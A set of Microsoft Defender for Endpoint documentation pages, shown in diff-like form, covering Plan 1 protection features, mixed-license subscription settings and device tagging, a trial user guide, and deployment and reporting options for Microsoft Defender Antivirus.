--- **[Next-generation protection](#next-generation-protection)** that includes industry-leading, robust antimalware and antivirus protection-- **[Manual response actions](#manual-response-actions)**, such as sending a file to quarantine, that your security team can take on devices or files when threats are detected-- **[Attack surface reduction capabilities](#attack-surface-reduction)** that harden devices, prevent zero-day attacks, and offer granular control over endpoint access and behaviors-- **[Centralized configuration and management](#centralized-management)** with the Microsoft Defender portal and integration with Microsoft Intune-- **[Protection for a variety of platforms](#cross-platform-support)**, including Windows, macOS, iOS, and Android devices-
-The following sections provide more details about these capabilities.
-
-## Next-generation protection
-
-Next-generation protection includes robust antivirus and antimalware protection. With next-generation protection, you get:
--- Behavior-based, heuristic, and real-time antivirus protection -- Cloud-delivered protection, which includes near-instant detection and blocking of new and emerging threats -- Dedicated protection and product updates, including updates related to Microsoft Defender Antivirus -
-To learn more, see [Next-generation protection overview](next-generation-protection.md).
-
-## Manual response actions
-
-Manual response actions are actions that your security team can take when threats are detected on endpoints or in files. Defender for Endpoint includes certain [manual response actions that can be taken on a device](respond-machine-alerts.md) that is detected as potentially compromised or has suspicious content. You can also run [response actions on files](respond-file-alerts.md) that are detected as threats. The following table summarizes the manual response actions that are available in Defender for Endpoint Plan 1. <br/><br/>
-
-| File/Device | Action | Description |
-|:|:|:|
-| Device | Run antivirus scan | Starts an antivirus scan. If any threats are detected on the device, those threats are often addressed during an antivirus scan. |
-| Device | Isolate device | Disconnects a device from your organization's network while retaining connectivity to Defender for Endpoint. This action enables you to monitor the device and take further action if needed. |
-| File | Add an indicator to block or allow a file | Block indicators prevent portable executable files from being read, written, or executed on devices. <p>Allow indicators prevent files from being blocked or remediated. |
-
-To learn more, see the following articles:
--- [Take response actions on devices](respond-machine-alerts.md) -- [Take response actions on files](respond-file-alerts.md)-
-## Attack surface reduction
-
-Your organization's attack surfaces are all the places where you're vulnerable to cyberattacks. With Defender for Endpoint Plan 1, you can reduce your attack surfaces by protecting the devices and applications that your organization uses. The attack surface reduction capabilities that are included in Defender for Endpoint Plan 1 are described in the following sections.
--- [Attack surface reduction rules](#attack-surface-reduction-rules)-- [Ransomware mitigation](#ransomware-mitigation)-- [Device control](#device-control)-- [Web protection](#web-protection)-- [Network protection](#web-protection)-- [Network firewall](#network-firewall)-- [Application control](#application-control)-
-To learn more about attack surface reduction capabilities in Defender for Endpoint, see [Overview of attack surface reduction](overview-attack-surface-reduction.md).
-
-### Attack surface reduction rules
-
-Attack surface reduction rules target certain software behaviors that are considered risky. Such behaviors include:
--- Launching executable files and scripts that attempt to download or run other files-- Running obfuscated or otherwise suspicious scripts-- Initiating behaviors that apps don't usually initiate during normal work-
-Legitimate business applications can exhibit such software behaviors; however, these behaviors are often considered risky because they are commonly abused by attackers through malware. Attack surface reduction rules can constrain risky behaviors and help keep your organization safe.
-
-To learn more, see [Use attack surface reduction rules to prevent malware infection](attack-surface-reduction.md).
-
-### Ransomware mitigation
-
-With controlled folder access, you get ransomware mitigation. Controlled folder access allows only trusted apps to access protected folders on your endpoints. Apps are added to the trusted apps list based on their prevalence and reputation. Your security operations team can add or remove apps from the trusted apps list, too.
-
-To learn more, see [Protect important folders with controlled folder access](controlled-folders.md).
-
-### Device control
-
-Sometimes threats to your organization's devices come in the form of files on removable drives, such as USB drives. Defender for Endpoint includes capabilities to help prevent threats from unauthorized peripherals from compromising your devices. You can configure Defender for Endpoint to block or allow removable devices and files on removable devices.
-
-To learn more, see [Control USB devices and removable media](control-usb-devices-using-intune.md).
-
-### Web protection
-
-With web protection, you can protect your organization's devices from web threats and unwanted content. Web protection includes web threat protection and web content filtering.
--- [Web threat protection](web-threat-protection.md) prevents access to phishing sites, malware vectors, exploit sites, untrusted or low-reputation sites, and sites that you explicitly block.-- [Web content filtering](web-content-filtering.md) prevents access to certain sites based on their category. Categories can include adult content, leisure sites, legal liability sites, and more.-
-To learn more, see [web protection](web-protection-overview.md).
-
-### Network protection
-
-With network protection, you can prevent your organization from accessing dangerous domains that might host phishing scams, exploits, and other malicious content on the Internet.
-
-To learn more, see [Protect your network](network-protection.md).
-
-### Network firewall
-
-With network firewall protection, you can set rules that determine which network traffic is permitted to flow to or from your organization's devices. With your network firewall and advanced security that you get with Defender for Endpoint, you can:
--- Reduce the risk of network security threats-- Safeguard sensitive data and intellectual property-- Extend your security investment-
-To learn more, see [Windows Defender Firewall with advanced security](/windows/security/threat-protection/windows-firewall/windows-firewall-with-advanced-security).
-
-### Application control
-
-Application control protects your Windows endpoints by running only trusted applications and code in the system core (kernel). Your security team can define application control rules that consider an application's attributes, such as its codesigning certificates, reputation, launching process, and more. Application control is available in Windows 10 or later.
-
-To learn more, see [Application control for Windows](/windows/security/threat-protection/windows-defender-application-control/windows-defender-application-control).
-
-## Centralized management
-
-Defender for Endpoint Plan 1 includes the Microsoft Defender portal, which enables your security team to view current information about detected threats, take appropriate actions to mitigate threats, and centrally manage your organization's threat protection settings.
-
-To learn more, see [Microsoft Defender portal overview](portal-overview.md).
-
-### Role-based access control
-
-Using role-based access control (RBAC), your security administrator can create roles and groups to grant appropriate access to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)). With RBAC, you have fine-grained control over who can access the Defender for Cloud, and what they can see and do.
-
-To learn more, see [Manage portal access using role-based access control](rbac.md).
-
-### Reporting
-
-The Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) provides easy access to information about detected threats and actions to address those threats.
--- The **Home** page includes cards to show at a glance which users or devices are at risk, how many threats were detected, and what alerts/incidents were created.-- The **Incidents & alerts** section lists any incidents that were created as a result of triggered alerts. Alerts and incidents are generated as threats are detected across devices.-- The **Action center** lists remediation actions that were taken. For example, if a file is sent to quarantine, or a URL is blocked, each action is listed in the Action center on the **History** tab.-- The **Reports** section includes reports that show threats detected and their status. -
-To learn more, see [Get started with Microsoft Defender for Endpoint Plan 1](mde-plan1-getting-started.md).
-
-### APIs
-
-With the Defender for Endpoint APIs, you can automate workflows and integrate with your organization's custom solutions.
-
-To learn more, see [Defender for Endpoint APIs](management-apis.md).
-
-## Cross-platform support
-
-Most organizations use various devices and operating systems. Defender for Endpoint Plan 1 supports the following operating systems:
--- Windows 10 and 11-- Windows 7 ([ESU required](/troubleshoot/windows-client/windows-7-eos-faq/windows-7-extended-security-updates-faq)) Pro or Enterprise -- Windows 8.1 Pro, Enterprise, and Pro Education -- macOS (the three most recent releases are supported)-- iOS-- Android OS-
-Servers require an additional license, such as:
--- **Microsoft Defender for Servers Plan 1 or Plan 2** (*recommended for enterprise customers*) as part of the [Defender for Cloud](/azure/defender-for-cloud/defender-for-cloud-introduction) offering. To learn more. see [Overview of Microsoft Defender for Servers](/azure/defender-for-cloud/defender-for-servers-introduction).-- **Microsoft Defender for Endpoint for Servers** (*recommended for enterprise customers*). To learn more, see [Defender for Endpoint onboarding Windows Server](onboard-windows-server.md).-- **Microsoft Defender for Business servers** (*for small and medium-sized businesses who have [Microsoft Defender for Business](../defender-business/mdb-overview.md)*). To learn more, see [How to get Microsoft Defender for Business servers](../defender-business/get-defender-business.md#how-to-get-microsoft-defender-for-business-servers).-
-See [Microsoft licensing and product terms](https://www.microsoft.com/en-us/licensing/product-licensing/products).
-
-## Next steps
--- [Set up and configure Defender for Endpoint Plan 1](mde-p1-setup-configuration.md)-- [Get started with Defender for Endpoint Plan 1](mde-plan1-getting-started.md)-- [Manage Defender for Endpoint Plan 1](manage-mde-post-migration.md)-- [Learn about exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security Defender Endpoint Subscription Settings https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-subscription-settings.md
- Title: Manage your Microsoft Defender for Endpoint subscription settings across client devices
-description: Learn about your options for managing your Defender for Endpoint subscription settings. Choose Plan 1, Plan 2, or mixed mode.
---- Previously updated : 02/21/2024------ M365-security-compliance-- m365initiative-defender-endpoint--
-# Manage Microsoft Defender for Endpoint subscription settings across client devices
-
-In Defender for Endpoint, a mixed-licensing scenario is a situation in which an organization is using a mix of Defender for Endpoint Plan 1 and Plan 2 licenses. The following table describes examples of mixed-licensing scenarios:
-
-| Scenario | Description |
-|:|:|
-| *Mixed tenant* | Use different sets of capabilities for groups of users and their devices. Examples include:<br/>- Defender for Endpoint Plan 1 and Defender for Endpoint Plan 2<br/>- Microsoft 365 E3 and Microsoft 365 E5 |
-| *Mixed trial* | Try a premium level subscription for some users. Examples include: <br/>- Defender for Endpoint Plan 1 (purchased for all users), and Defender for Endpoint Plan 2 (a trial subscription has been started for some users)<br/>- Microsoft 365 E3 (purchased for all users), and Microsoft 365 E5 (a trial subscription has been started for some users) |
-| *Phased upgrades* | Upgrade user licenses in phases. Examples include:<br/>- Moving groups of users from Defender for Endpoint Plan 1 to Plan 2<br/>- Moving groups of users from Microsoft 365 E3 to E5 |
-
- Until recently, mixed-licensing scenarios weren't supported; in cases of multiple subscriptions, the highest functional subscription would take precedence for your tenant. Now, you can manage your subscription settings to accommodate mixed licensing scenarios across client devices. These capabilities enable you to:
--- **Set your tenant to mixed mode and tag devices** to determine which client devices will receive features and capabilities from each plan (we call this option *mixed mode*); **OR**,-- **Use the features and capabilities from one plan across all your client devices**. -
-You can also use a newly added license usage report to track status.
-
-> [!NOTE]
-> If you're using Microsoft Defender for Business and you want to switch to Defender for Endpoint Plan 2, see [Change your endpoint security subscription](../defender-business/mdb-manage-subscription.md).
-
-## [**Use mixed mode**](#tab/mixed)
-
-## Set your tenant to mixed mode and tag devices
-
-> [!IMPORTANT]
-> - **Mixed-mode settings apply to client endpoints only**. Tagging server devices won't change their subscription state. All server devices running Windows Server or Linux should have appropriate licenses, such as [Defender for Servers](/azure/defender-for-cloud/plan-defender-for-servers-select-plan). See [Options for onboarding servers](onboard-windows-server.md).
-> - **Make sure to follow the procedures in this article to try mixed-license scenarios in your environment**. Assigning user licenses in the Microsoft 365 admin center ([https://admin.microsoft.com](https://admin.microsoft.com)) doesn't set your tenant to mixed mode.
-> - **You should have active trial or paid licenses for both Defender for Endpoint Plan 1 and Plan 2**.
-> - To access license information, you must have one of the following roles assigned in Microsoft Entra ID:
-> - Global Admin
-> - Security Admin
-> - License Admin + MDE Admin
-
-1. As an admin, go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. Go to **Settings** > **Endpoints** > **Licenses**. Your usage report opens and displays information about your organization's Defender for Endpoint licenses.
-
-3. Under **Subscription state**, select **Manage subscription settings**.
-
- > [!NOTE]
- > If you don't see **Manage subscription settings**, at least one of the following conditions is true:
- > - You have Defender for Endpoint Plan 1 or Plan 2 (but not both); or
- > - Mixed-license capabilities haven't rolled out to your tenant yet.
-
-4. A **Subscription settings** flyout opens. Choose the option to use Defender for Endpoint Plan 1 and Plan 2. (No changes will occur until devices are tagged as per the next step.)
-
-5. Tag the devices that should receive either Defender for Endpoint Plan 1 or Plan 2 capabilities. You can choose to tag your devices manually or by using a dynamic rule. [Learn more about device tagging](#more-details-about-device-tagging).
-
- | Method | Details |
- |:|:|
- | Tag devices manually | To tag devices manually, create a tag called `License MDE P1` and apply it to devices. To get help with this step, see [Create and manage device tags](machine-tags.md).<br/><br/>Note that devices that are tagged with the `License MDE P1` tag using the [registry key method](machine-tags.md#add-device-tags-by-setting-a-registry-key-value) will not receive downgraded functionality. If you want to tag devices by using the registry key method, use a dynamic rule instead of manual tagging. |
- | Tag devices automatically by using a dynamic rule | *Dynamic rule functionality is new for mixed-license scenarios! It allows you to apply a dynamic and granular level of control over how you manage devices*. <br/><br/>To use a dynamic rule, you specify a set of criteria based on device name, domain, operating system platform, and/or device tags. Devices that meet the specified criteria will receive the Defender for Endpoint Plan 1 or Plan 2 capabilities according to your rule. <br/><br/>As you define your criteria, you can use the following condition operators: <br/>- `Equals` / `Not equals`<br/>- `Starts with`<br/>- `Contains` / `Does not contain` <br/><br/>For **Device name**, you can use freeform text.<br/><br/>For **Domain**, select from a list of domains.<br/><br/>For **OS platform**, select from a list of operating systems.<br/><br/>For **Tag**, use the freeform text option. Type the tag value that corresponds to the devices that should receive either Defender for Endpoint Plan 1 or Plan 2 capabilities. See the example in [More details about device tagging](#more-details-about-device-tagging). |
-
- Device tags are visible in the **Device inventory** view and in the [Defender for Endpoint APIs](apis-intro.md).
-
- > [!NOTE]
- > Dynamically added Defender for Endpoint P1 tags are not currently filterable in the Device inventory view.
-
-6. Save your rule and wait for up to three (3) hours for tags to be applied. Then, proceed to [Validate that a device is receiving only Defender for Endpoint Plan 1 capabilities](#validate-that-a-device-is-receiving-only-defender-for-endpoint-plan-1-capabilities).
-
-### More details about device tagging
-
-As described in [Tech Community blog: How to use tagging effectively](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/how-to-use-tagging-effectively-part-1/ba-p/1964058), device tagging provides you with granular control over devices. With device tags, you can:
--- Display certain devices to individual users in the Microsoft Defender portal so that they see only the devices they're responsible for.-- Include or exclude devices from specific security policies.-- Determine which devices should receive Defender for Endpoint Plan 1 or Plan 2 capabilities.-
-For example, suppose that you want to use a tag called `VIP` for all the devices that should receive Defender for Endpoint Plan 2 capabilities. Here's what you would do:
-
-1. Create a device tag called `VIP`, and apply it to all the devices that should receive Defender for Endpoint Plan 2 capabilities. Use one of the following methods to create your device tag:
-
- - [Add device tags using the portal](machine-tags.md#add-device-tags-using-the-portal).
- - [Add device tags by setting a registry key value](machine-tags.md#add-device-tags-by-setting-a-registry-key-value).
- - [Add or remove machine tags by using the Defender for Endpoint API](add-or-remove-machine-tags.md).
- - [Add device tags by creating a custom profile in Microsoft Intune](machine-tags.md#add-device-tags-by-creating-a-custom-profile-in-microsoft-intune).
-
-2. Set up a dynamic rule using the condition operator `Tag Does not contain VIP`. In this case, all devices that do not have the `VIP` tag will receive the `License MDE P1` tag and Defender for Endpoint Plan 1 capabilities.
--
-## [**Use one plan**](#tab/oneplan)
-
-## Use the features and capabilities from one plan across all your devices
-
-> [!IMPORTANT]
-> To access license information, you must have one of the following roles assigned in Microsoft Entra ID:
-> - Global Admin
-> - Security Admin
-> - License Admin + MDE Admin
-
-1. As a Security Admin or Global Admin, go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. Go to **Settings** > **Endpoints** > **Licenses**.
-
-3. Under **Subscription state**, select **Manage subscription settings**.
-
- > [!NOTE]
- > If you don't see **Manage subscription settings**, at least one of the following conditions is true:
- > - You have Defender for Endpoint Plan 1 or Plan 2 (but not both); or
- > - Mixed-license capabilities haven't rolled out to your tenant yet.
-
-4. A **Subscription settings** flyout opens. Choose one plan for all users and devices, and then select **Done**. It can take up to three hours for your changes to be applied.
-
- If you chose to apply Defender for Endpoint Plan 1 to all devices, proceed to [Validate that devices are receiving only Defender for Endpoint Plan 1 capabilities](#validate-that-a-device-is-receiving-only-defender-for-endpoint-plan-1-capabilities).
---
-## Validate that a device is receiving only Defender for Endpoint Plan 1 capabilities
-
-After you have assigned Defender for Endpoint Plan 1 capabilities to some or all devices, you can verify that an individual device is receiving those capabilities.
-
-1. In the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), go to **Assets** > **Devices**.
-
-2. Select a device that is tagged with `License MDE P1`. You should see that Defender for Endpoint Plan 1 is assigned to the device.
-
-> [!NOTE]
-> Devices that are assigned Defender for Endpoint Plan 1 capabilities don't have any vulnerabilities or security recommendations listed.
-
-## Review license usage
-
-The license usage report is estimated based on sign-in activities on the device. Defender for Endpoint Plan 2 licenses are per user, and each user can have up to five concurrent, onboarded devices. To learn more about license terms, see [Microsoft Licensing](https://www.microsoft.com/en-us/licensing/default).
-
-To reduce management overhead, there's no requirement for device-to-user mapping and assignment. Instead, the license report provides a utilization estimation that is calculated based on device usage seen across your organization. It might take up to one day for your usage report to reflect the active usage of your devices.
-
-> [!IMPORTANT]
-> To access license information, you must have one of the following roles assigned in Microsoft Entra ID:
-> - Security Admin
-> - Global Admin
-> - License Admin + MDE Admin
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. Choose **Settings** > **Endpoints** > **Licenses**.
-
-3. Review your available and assigned licenses. The calculation is based on detected users who have accessed devices that are onboarded to Defender for Endpoint.
-
-## More resources
--- [Licensing and product terms for Microsoft 365 subscriptions](https://www.microsoft.com/licensing/terms/productoffering/Microsoft365/MCA).-- [How to contact support for Defender for Endpoint](contact-support.md).-- [Get started with Microsoft Security (trial offers)](https://www.microsoft.com/security/business/get-started/start-free-trial)-- [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md) (endpoint protection for small and medium-sized businesses)-
security Defender Endpoint Trial User Guide https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/defender-endpoint-trial-user-guide.md
- Title: Trial user guide - Microsoft Defender for Endpoint
-description: Use this guide to get the most of your 90-day free trial. See how Defender for Endpoint can help prevent, detect, investigate, and respond to advanced threats.
---- Previously updated : 07/07/2022--- m365-security-- tier2-----
-# Trial user guide: Microsoft Defender for Endpoint
-
-Welcome to the Microsoft Defender for Endpoint Plan 2 trial user guide!
-
-This playbook is a simple guide to help you make the most of your free trial. Using the suggested steps in this article from the Microsoft Defender team, you'll learn how Defender for Endpoint can help you to prevent, detect, investigate, and respond to advanced threats.
-
-## What is Defender for Endpoint?
-
-[Defender for Endpoint](microsoft-defender-endpoint.md) is an enterprise endpoint security platform that uses the following combination of technology built into Windows and Microsoft's robust cloud service:
--- **Endpoint behavioral sensors**: Embedded in Windows, these sensors collect and process behavioral signals from the operating system and send sensor data to your private, isolated, cloud instance of Defender for Endpoint.--- **Cloud security analytics**: Using big data, device learning, and unique Microsoft optics across the Windows ecosystem, enterprise cloud products (such as Microsoft 365), and online assets, behavioral signals are translated into insights, detections, and recommended responses to advanced threats.--- **Threat intelligence**: Generated by Microsoft hunters and security teams, and augmented by threat intelligence provided by partners, threat intelligence enables Defender for Endpoint to identify attacker tools, techniques, and procedures, and generate alerts when they're observed in collected sensor data.-
-<center><h2>Microsoft Defender for Endpoint</center></h2>
-<table>
-<tr>
-<td><a href="microsoft-defender-endpoint.md#tvm"><center><img src="medivm.png" alt="Vulnerability Management"> <br><b> Core Defender Vulnerability Management</b></center></a></td>
-<td><a href="microsoft-defender-endpoint.md#asr"><center><img src="media/asr-icon.png" alt="Attack surface reduction"><br><b>Attack surface reduction</b></center></a></td>
-<td><center><a href="microsoft-defender-endpoint.md#ngp"><img src="media/ngp-icon.png" alt="Next-generation protection"><br> <b>Next-generation protection</b></a></center></td>
-<td><center><a href="microsoft-defender-endpoint.md#edr"><img src="media/edr-icon.png" alt="Endpoint detection and response"><br> <b>Endpoint detection and response</b></a></center></td>
-<td><center><a href="microsoft-defender-endpoint.md#ai"><img src="media/air-icon.png" alt="Automated investigation and remediation"><br> <b>Automated investigation and remediation</b></a></center></td>
-<td><center><a href="microsoft-defender-endpoint.md#mte"><img src="media/mte-icon.png" alt="Microsoft Threat Experts"><br> <b>Microsoft Threat Experts</b></a></center></td>
-</tr>
-<tr>
-<td colspan="7">
-<a href="microsoft-defender-endpoint.md#apis"><center><b>Centralized configuration and administration, APIs</a></b></center></td>
-</tr>
-<tr>
-<td colspan="7"><a href="microsoft-defender-endpoint.md#mtp"><center><b>Microsoft Defender XDR</a></center></b></td>
-</tr>
-</table>
-<br>
-
-**Let's get started!**
-
-## Set up your trial
-
-1. [Confirm your license state](#step-1-confirm-your-license-state).
-2. [Set up role-based access control and grant permissions to your security team](#step-2-set-up-role-based-access-control-and-grant-permissions-to-your-security-team).
-3. [Visit the Microsoft Defender portal](#step-3-visit-the-microsoft-365-defender-portal).
-4. [Onboard endpoints using any of the supported management tools](#step-4-onboard-endpoints-using-any-of-the-supported-management-tools).
-5. [Configure capabilities](#step-5-configure-capabilities).
-6. [Experience Microsoft Defender for Endpoint through simulated attacks](#step-6-experience-microsoft-defender-for-endpoint-through-simulated-attacks).
-7. [Set up the Microsoft Defender for Endpoint evaluation lab](#step-7-set-up-the-microsoft-defender-for-endpoint-evaluation-lab).
-
-## Step 1: Confirm your license state
-
-To make sure your Defender for Endpoint subscription is properly provisioned, you can check your license state in either the Microsoft 365 admin center ([https://admin.microsoft.com](https://admin.microsoft.com)) or Microsoft Entra ID ([https://portal.azure.com](https://portal.azure.com/#blade/Microsoft_AAD_IAM/LicensesMenuBlade/Products)).
-
-[Check your license state](production-deployment.md#check-license-state).
-
-## Step 2: Set up role-based access control and grant permissions to your security team
-
-Microsoft recommends using the concept of least privileges. Defender for Endpoint uses built-in roles within Microsoft Entra ID. [Review the different roles that are available](/azure/active-directory/roles/permissions-reference) and choose appropriate roles for your security team. Some roles may need to be applied temporarily and removed after the trial has been completed.
-
-Use [Privileged Identity Management](/azure/active-directory/active-directory-privileged-identity-management-configure) to manage your roles to provide extra auditing, control, and access review for users with directory permissions.
-
-Defender for Endpoint supports two ways to manage permissions:
--- Basic permissions management: Set permissions to either full access or read-only. Users with Global Administrator or Security Administrator roles in Microsoft Entra ID have full access. The Security reader role has read-only access and doesn't grant access to view machines/device inventory.-- Role-based access control (RBAC): Set granular permissions by defining roles, assigning Microsoft Entra user groups to the roles, and granting the user groups access to device groups. For more information, see [Manage portal access using role-based access control](rbac.md).-
- > [!NOTE]
- > Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-<a name='step-3-visit-the-microsoft-365-defender-portal'></a>
-
-## Step 3: Visit the Microsoft Defender portal
-
-The Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) is where you can access your Defender for Endpoint capabilities.
-
-1. [Review what to expect](../defender/microsoft-365-defender-portal.md) in the Microsoft Defender portal.
-
-2. Go to [https://security.microsoft.com](https://security.microsoft.com) and sign in.
-
-3. In the navigation pane, see the **Endpoints** section to access your capabilities.
-
-## Step 4: Onboard endpoints using any of the supported management tools
-
-This section outlines the general steps you to onboard devices (endpoints).
-
-1. [Watch this video](https://www.microsoft.com/videoplayer/embed/RE4bGqr) for a quick overview of the onboarding process and learn about the available tools and methods.
-
-2. Review your [device onboarding tool options](onboarding.md) and select the most appropriate option for your environment.
-
-## Step 5: Configure capabilities
-
-After onboarding devices (endpoints), you'll configure the various capabilities, such as endpoint detection and response, next-generation protection, and attack surface reduction.
-
-Use [this table](onboarding.md) to choose components to configure. We recommend configuring all available capabilities, but you're able to skip the ones that don't apply.
-
-## Step 6: Experience Microsoft Defender for Endpoint through simulated attacks
-
-You might want to experience Defender for Endpoint before you onboard more than a few devices to the service. To do this, you can run controlled attack simulations on a few test devices. After running the simulated attacks, you can review how Defender for Endpoint surfaces malicious activity and explore how it enables an efficient response.
-
-To run any of the provided simulations, you need at least [one onboarded device](onboard-configure.md).
-
-1. Access the tutorials. In the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), in the navigation pane, under **Endpoints**, choose **Tutorials**.
-
-2. Read the walkthrough document provided with each attack scenario. Each document includes OS and application requirements and detailed instructions that are specific to an attack scenario.
-
-3. [Run a simulation](attack-simulations.md).
-
-## Step 7: Set up the Microsoft Defender for Endpoint evaluation lab
-
-The Microsoft Defender for Endpoint evaluation lab is designed to eliminate the complexities of device and environment configuration so that you can focus on evaluating the capabilities of the platform, running simulations, and seeing the prevention, detection, and remediation features in action. Using the simplified set-up experience in evaluation lab, you can focus on running your own test scenarios and the pre-made simulations to see how Defender for Endpoint performs.
--- [Watch the video overview](https://www.microsoft.com/videoplayer/embed/RE4qLUM) of the evaluation lab-- [Get started with the lab](evaluation-lab.md) --
-## See also
--- [Defender for Endpoint technical documentation](microsoft-defender-endpoint.md)-- [Microsoft Security technical content library](https://www.microsoft.com/security/content-library/Home/Index)-- [Defender for Endpoint demonstration](https://cdx.transform.microsoft.com/experience-detail/d5eca65d-13a3-464d-9171-c24cf9dd6050)-
security Deploy Manage Report Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/deploy-manage-report-microsoft-defender-antivirus.md
- Title: Deploy, manage, and report on Microsoft Defender Antivirus
-description: You can deploy and manage Microsoft Defender Antivirus with Intune, Microsoft Configuration Manager, Group Policy, PowerShell, or WMI
- Previously updated : 03/23/2023---------- m365-security-- tier2-- mde-ngp--
-# Deploy, manage, and report on Microsoft Defender Antivirus
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus -
-**Platforms**
--- Windows-
-Microsoft Defender Antivirus is installed as a core part of Windows 10 and 11, and is included in Windows Server 2016 and later (Windows Server 2012 requires Microsoft Defender for Endpoint). You can manage and report on Microsoft Defender Antivirus using one of several tools, such as:
--- [Microsoft Intune](#microsoft-intune)-- [Configuration Manager](#configuration-manager)-- [PowerShell](#powershell)-- [Group Policy and Microsoft Entra ID](#powershell)-- [Windows Management Instrumentation](#windows-management-instrumentation)-
-This article describes these options for deployment, management, and reporting.
-
-## Microsoft Intune
-
-With Intune, you can manage device security through policies, such as a policy to configure Microsoft Defender Antivirus and other security capabilities in Defender for Endpoint. To learn more, see [Use policies to manage device security](/mem/intune/protect/endpoint-security#use-policies-to-manage-device-security).
-
-For reporting, you can choose from several options:
--- [Use the Microsoft Defender portal](../defender/microsoft-365-defender-portal.md), which includes a [device inventory list](/microsoft-365/security/defender-endpoint/machines-view-overview). To access the device inventory, in the Microsoft Defender portal ([https://security.microsoft.com/](https://security.microsoft.com/)), go to **Assets** > **Devices**. The device inventory list displays onboarded devices along with their health state and risk level.--- [Manage devices with Intune](/mem/intune/remote-actions/device-management), which includes the ability to view detailed information about devices and take action. [Available actions](/mem/intune/remote-actions/device-management#available-device-actions) include starting an antivirus scan, restarting a device, locating a device, wiping a device, and more. -
-## Configuration Manager
-
-With Configuration Manager, you can manage security and malware on Configuration Manager client computers. Use the [Endpoint Protection point site system role](/mem/configmgr/protect/deploy-use/endpoint-protection-site-role) and [enable Endpoint Protection with custom client settings](/mem/configmgr/protect/deploy-use/endpoint-protection-configure-client). You can use [default and customized antimalware policies](/microsoft-365/security/office-365-security/anti-malware-policies-configure).
-
-For reporting, you can choose from several options:
--- [Use the Microsoft Defender portal](../defender/microsoft-365-defender-portal.md), which includes a [device inventory list](/microsoft-365/security/defender-endpoint/machines-view-overview). To access the device inventory, in the Microsoft Defender portal ([https://security.microsoft.com/](https://security.microsoft.com/)), go to **Assets** > **Devices**. The device inventory list displays onboarded devices along with their health state and risk level.--- [Use Intune to view device details](/mem/intune/remote-actions/device-inventory).--- Use the default [Configuration Manager Monitoring workspace](/mem/configmgr/apps/deploy-use/monitor-applications-from-the-console).--- [Create email alerts](/configmgr/protect/deploy-use/endpoint-configure-alerts).--- If your organization has Defender for Endpoint, you can also use the [Microsoft Defender portal](../defender/microsoft-365-defender-portal.md), which includes a [device inventory list](/microsoft-365/security/defender-endpoint/machines-view-overview). To access the device inventory, in the Microsoft Defender portal ([https://security.microsoft.com/](https://security.microsoft.com/)), go to **Assets** > **Devices**. The device inventory list displays onboarded devices along with their health state and risk level.-
-## PowerShell
-
-You can use PowerShell with Group Policy or Configuration Manager to manage Microsoft Defender Antivirus on client devices. You can also use PowerShell to manage Microsoft Defender Antivirus manually on individual devices that are not managed by a security team.
--- Use the appropriate [Get- cmdlets available in the Defender module](/powershell/module/defender).--- Use the [Set-MpPreference](/powershell/module/defender/set-mppreference) and [Update-MpSignature](/powershell/module/defender/update-mpsignature) cmdlets that are available in the Defender module.-
-For reporting, you can choose from the following options:
--- [Use the Microsoft Defender portal](../defender/microsoft-365-defender-portal.md), which includes a [device inventory list](/microsoft-365/security/defender-endpoint/machines-view-overview). To access the device inventory, in the Microsoft Defender portal ([https://security.microsoft.com/](https://security.microsoft.com/)), go to **Assets** > **Devices**. The device inventory list displays onboarded devices along with their health state and risk level.--- [Use Intune to view device details](/mem/intune/remote-actions/device-inventory).--- Use the default [Configuration Manager Monitoring workspace](/mem/configmgr/apps/deploy-use/monitor-applications-from-the-console).-
-<a name='group-policy-and-azure-active-directory'></a>
-
-## Group Policy and Microsoft Entra ID
-
-You can use a Group Policy Object to deploy configuration changes and ensure Microsoft Defender Antivirus is enabled. Use Group Policy Objects (GPOs) to [configure update options for Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/manage-protection-update-schedule-microsoft-defender-antivirus) and [configure Windows Defender features](/microsoft-365/security/defender-endpoint/configure-microsoft-defender-antivirus-features).
-
-For reporting, keep in mind that device reporting isn't available with Group Policy.
--- You can generate a list of Group Policies to determine if any settings or policies aren't applied. --- If your organization has Defender for Endpoint, you can also use the [Microsoft Defender portal](../defender/microsoft-365-defender-portal.md), which includes a [device inventory list](/microsoft-365/security/defender-endpoint/machines-view-overview). To access the device inventory, in the Microsoft Defender portal ([https://security.microsoft.com/](https://security.microsoft.com/)), go to **Assets** > **Devices**. The device inventory list displays onboarded devices along with their health state and risk level.-
-## Windows Management Instrumentation
-
-With Windows Management Instrumentation (WMI), you can manage Microsoft Defender Antivirus with Group Policy or Configuration Manager. You can also use WMI to manage Microsoft Defender Antivirus manually on individual devices that aren't managed by a security team.
--- Use the [Set method of the MSFT_MpPreference class](/previous-versions/windows/desktop/defender/set-msft-mppreference) and the [Update method of the MSFT_MpSignature class](/previous-versions/windows/desktop/defender/update-msft-mpsignature).--- Use the [MSFT_MpComputerStatus](/previous-versions/windows/desktop/defender/msft-mpcomputerstatus) class and the get method of associated classes in the [Windows Defender WMIv2 Provider](/windows/win32/wmisdk/wmi-providers).-
